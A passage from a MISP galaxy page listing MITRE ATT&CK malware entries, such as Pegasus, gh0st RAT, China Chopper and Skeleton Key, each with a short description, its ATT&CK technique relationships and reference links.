https://blog.aquasec.com/container-security-tnt-container-attack
https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf

Malware

Name of ATT&CK software.

Malware is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: MITRE

Hacking Team UEFI Rootkit - S0047

[Hacking Team UEFI Rootkit](https://attack.mitre.org/software/S0047) is a rootkit developed by the company Hacking Team as a method of persistence for remote access software. (Citation: TrendMicro Hacking Team UEFI)

The tag is: misp-galaxy:mitre-malware="Hacking Team UEFI Rootkit - S0047"

Hacking Team UEFI Rootkit - S0047 is also known as:

Hacking Team UEFI Rootkit

View relationships graph

Hacking Team UEFI Rootkit - S0047 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Firmware - T1019" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Firmware - T1542.001" with estimative-language:likelihood-probability="almost-certain"

Table 4583. Table References
Links
https://attack.mitre.org/software/S0047
http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-uses-uefi-bios-rootkit-to-keep-rcs-9-agent-in-target-systems/

X-Agent for Android - S0314

[X-Agent for Android](https://attack.mitre.org/software/S0314) is Android malware that was placed in a repackaged version of a Ukrainian artillery targeting application. The malware reportedly retrieved general location data on where the victim device was used, and therefore could likely indicate the potential location of Ukrainian artillery. (Citation: CrowdStrike-Android) Is it tracked separately from the [CHOPSTICK](https://attack.mitre.org/software/S0023).

The tag is: misp-galaxy:mitre-malware="X-Agent for Android - S0314"

X-Agent for Android - S0314 is also known as:

X-Agent for Android

View relationships graph

X-Agent for Android - S0314 has relationships with:

similar: misp-galaxy:tool="CHOPSTICK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="X-Agent" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="X-Agent (Android)" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

Table 4584. Table References
Links
https://attack.mitre.org/software/S0314
https://www.crowdstrike.com/wp-content/brochures/FancyBearTracksUkrainianArtillery.pdf

Red Alert 2.0 - S0539

[Red Alert 2.0](https://attack.mitre.org/software/S0539) is a banking trojan that masquerades as a VPN client.(Citation: Sophos Red Alert 2.0)

The tag is: misp-galaxy:mitre-malware="Red Alert 2.0 - S0539"

Red Alert 2.0 - S0539 is also known as:

Red Alert 2.0

View relationships graph

Red Alert 2.0 - S0539 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1509" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1481" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

Table 4585. Table References
Links
https://attack.mitre.org/software/S0539
https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/

Exaramel for Linux - S0401

[Exaramel for Linux](https://attack.mitre.org/software/S0401) is a backdoor written in the Go Programming Language and compiled as a 64-bit ELF binary. The Windows version is tracked separately under [Exaramel for Windows](https://attack.mitre.org/software/S0343).(Citation: ESET TeleBots Oct 2018)

The tag is: misp-galaxy:mitre-malware="Exaramel for Linux - S0401"

Exaramel for Linux - S0401 is also known as:

Exaramel for Linux

View relationships graph

Exaramel for Linux - S0401 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1548.001" with estimative-language:likelihood-probability="almost-certain"

Table 4586. Table References
Links
https://attack.mitre.org/software/S0401
https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/

Winnti for Linux - S0430

[Winnti for Linux](https://attack.mitre.org/software/S0430) is a trojan, seen since at least 2015, designed specifically for targeting Linux systems. Reporting indicates the winnti malware family is shared across a number of actors including [Winnti Group](https://attack.mitre.org/groups/G0044). The Windows variant is tracked separately under [Winnti for Windows](https://attack.mitre.org/software/S0141).(Citation: Chronicle Winnti for Linux May 2019)

The tag is: misp-galaxy:mitre-malware="Winnti for Linux - S0430"

Winnti for Linux - S0430 is also known as:

Winnti for Linux

View relationships graph

Winnti for Linux - S0430 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Traffic Signaling - T1205" with estimative-language:likelihood-probability="almost-certain"

Table 4587. Table References
Links
https://attack.mitre.org/software/S0430
https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a

XLoader for iOS - S0490

[XLoader for iOS](https://attack.mitre.org/software/S0490) is a malicious iOS application that is capable of gathering system information.(Citation: TrendMicro-XLoader-FakeSpy) It is tracked separately from the [XLoader for Android](https://attack.mitre.org/software/S0318).

The tag is: misp-galaxy:mitre-malware="XLoader for iOS - S0490"

XLoader for iOS - S0490 is also known as:

XLoader for iOS

View relationships graph

XLoader for iOS - S0490 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 4588. Table References
Links
https://attack.mitre.org/software/S0490
https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/

Winnti for Windows - S0141

[Winnti for Windows](https://attack.mitre.org/software/S0141) is a Trojan that has been used by multiple groups to carry out intrusions in varied regions from at least 2010 to 2016. One of the groups using this malware is referred to by the same name, [Winnti Group](https://attack.mitre.org/groups/G0044); however, reporting indicates a second distinct group, [Axiom](https://attack.mitre.org/groups/G0001), also uses the malware. (Citation: Kaspersky Winnti April 2013) (Citation: Microsoft Winnti Jan 2017) (Citation: Novetta Winnti April 2015) The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019)

The tag is: misp-galaxy:mitre-malware="Winnti for Windows - S0141"

Winnti for Windows - S0141 is also known as:

Winnti for Windows

View relationships graph

Winnti for Windows - S0141 has relationships with:

similar: misp-galaxy:tool="Winnti" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Winnti (Windows)" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 4589. Table References
Links
https://attack.mitre.org/software/S0141
https://securelist.com/winnti-more-than-just-a-game/37029/
https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/
http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf
https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a

Pegasus for Android - S0316

[Pegasus for Android](https://attack.mitre.org/software/S0316) is the Android version of malware that has reportedly been linked to the NSO Group. (Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor) The iOS version is tracked separately under [Pegasus for iOS](https://attack.mitre.org/software/S0289).

The tag is: misp-galaxy:mitre-malware="Pegasus for Android - S0316"

Pegasus for Android - S0316 is also known as:

Pegasus for Android
Chrysaor

View relationships graph

Pegasus for Android - S0316 has relationships with:

similar: misp-galaxy:tool="Chrysaor" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Chrysaor" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Calendar Entries - T1435" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Alternate Network Mediums - T1438" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"

Table 4590. Table References
Links
https://attack.mitre.org/software/S0316
https://blog.lookout.com/blog/2017/04/03/pegasus-android/
https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html

XLoader for Android - S0318

[XLoader for Android](https://attack.mitre.org/software/S0318) is a malicious Android app first observed targeting Japan, Korea, China, Taiwan, and Hong Kong in 2018. It has more recently been observed targeting South Korean users as a pornography application.(Citation: TrendMicro-XLoader-FakeSpy)(Citation: TrendMicro-XLoader) It is tracked separately from the [XLoader for iOS](https://attack.mitre.org/software/S0490).

The tag is: misp-galaxy:mitre-malware="XLoader for Android - S0318"

XLoader for Android - S0318 is also known as:

XLoader for Android

View relationships graph

XLoader for Android - S0318 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1481" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"

Table 4591. Table References
Links
https://attack.mitre.org/software/S0318
https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/
https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/

Pegasus for iOS - S0289

[Pegasus for iOS](https://attack.mitre.org/software/S0289) is the iOS version of malware that has reportedly been linked to the NSO Group. It has been advertised and sold to target high-value victims. (Citation: Lookout-Pegasus) (Citation: PegasusCitizenLab) The Android version is tracked separately under [Pegasus for Android](https://attack.mitre.org/software/S0316).

The tag is: misp-galaxy:mitre-malware="Pegasus for iOS - S0289"

Pegasus for iOS - S0289 is also known as:

Pegasus for iOS

View relationships graph

Pegasus for iOS - S0289 has relationships with:

similar: misp-galaxy:tool="Chrysaor" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Chrysaor" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Exploit via Radio Interfaces - T1477" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Alternate Network Mediums - T1438" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1456" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

Table 4592. Table References
Links
https://attack.mitre.org/software/S0289
https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf
https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

Exaramel for Windows - S0343

[Exaramel for Windows](https://attack.mitre.org/software/S0343) is a backdoor used for targeting Windows systems. The Linux version is tracked separately under [Exaramel for Linux](https://attack.mitre.org/software/S0401).(Citation: ESET TeleBots Oct 2018)

The tag is: misp-galaxy:mitre-malware="Exaramel for Windows - S0343"

Exaramel for Windows - S0343 is also known as:

Exaramel for Windows

View relationships graph

Exaramel for Windows - S0343 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 4593. Table References
Links
https://attack.mitre.org/software/S0343
https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/

P.A.S. Webshell - S0598

[P.A.S. Webshell](https://attack.mitre.org/software/S0598) is a publicly available multifunctional PHP webshell in use since at least 2016 that provides remote access and execution on target web servers.(Citation: ANSSI Sandworm January 2021)

The tag is: misp-galaxy:mitre-malware="P.A.S. Webshell - S0598"

P.A.S. Webshell - S0598 is also known as:

P.A.S. Webshell
Fobushell

View relationships graph

P.A.S. Webshell - S0598 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 4594. Table References
Links
https://attack.mitre.org/software/S0598
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf
https://us-cert.cisa.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf

gh0st RAT - S0032

[gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups. (Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018)

The tag is: misp-galaxy:mitre-malware="gh0st RAT - S0032"

gh0st RAT - S0032 is also known as:

gh0st RAT

View relationships graph

gh0st RAT - S0032 has relationships with:

similar: misp-galaxy:tool="gh0st" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fast Flux DNS - T1568.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"

Table 4595. Table References
Links
https://attack.mitre.org/software/S0032
https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html
https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/
https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/

China Chopper - S0020

[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. (Citation: Lee 2013) It has been used by several threat groups. (Citation: Dell TG-3390) (Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)

The tag is: misp-galaxy:mitre-malware="China Chopper - S0020"

China Chopper - S0020 is also known as:

China Chopper

View relationships graph

China Chopper - S0020 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

Table 4596. Table References
Links
https://attack.mitre.org/software/S0020
https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage
https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html
https://us-cert.cisa.gov/ncas/alerts/aa21-200a

Skeleton Key - S0007

[Skeleton Key](https://attack.mitre.org/software/S0007) is malware used to inject false credentials into domain controllers with the intent of creating a backdoor password. (Citation: Dell Skeleton) Functionality similar to [Skeleton Key](https://attack.mitre.org/software/S0007) is included as a module in [Mimikatz](https://attack.mitre.org/software/S0002).

The tag is: misp-galaxy:mitre-malware="Skeleton Key - S0007"

Skeleton Key - S0007 is also known as:

Skeleton Key

View relationships graph

Skeleton Key - S0007 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Domain Controller Authentication - T1556.001" with estimative-language:likelihood-probability="almost-certain"

Table 4597. Table References
Links
https://attack.mitre.org/software/S0007
https://www.secureworks.com/research/skeleton-key-malware-analysis

P2P ZeuS - S0016

[P2P ZeuS](https://attack.mitre.org/software/S0016) is a closed-source fork of the leaked version of the ZeuS botnet. It presents improvements over the leaked version, including a peer-to-peer architecture. (Citation: Dell P2P ZeuS)

The tag is: misp-galaxy:mitre-malware="P2P ZeuS - S0016"

P2P ZeuS - S0016 is also known as:

P2P ZeuS
Peer-to-Peer ZeuS
Gameover ZeuS

View relationships graph

P2P ZeuS - S0016 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001" with estimative-language:likelihood-probability="almost-certain"

Table 4598. Table References
Links
https://attack.mitre.org/software/S0016
http://www.secureworks.com/cyber-threat-intelligence/threats/The_Lifecycle_of_Peer_to_Peer_Gameover_ZeuS/

Unknown Logger - S0130

[Unknown Logger](https://attack.mitre.org/software/S0130) is a publicly released, free backdoor. Version 1.5 of the backdoor has been used by the actors responsible for the MONSOON campaign. (Citation: Forcepoint Monsoon)

The tag is: misp-galaxy:mitre-malware="Unknown Logger - S0130"

Unknown Logger - S0130 is also known as:

Unknown Logger

View relationships graph

Unknown Logger - S0130 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

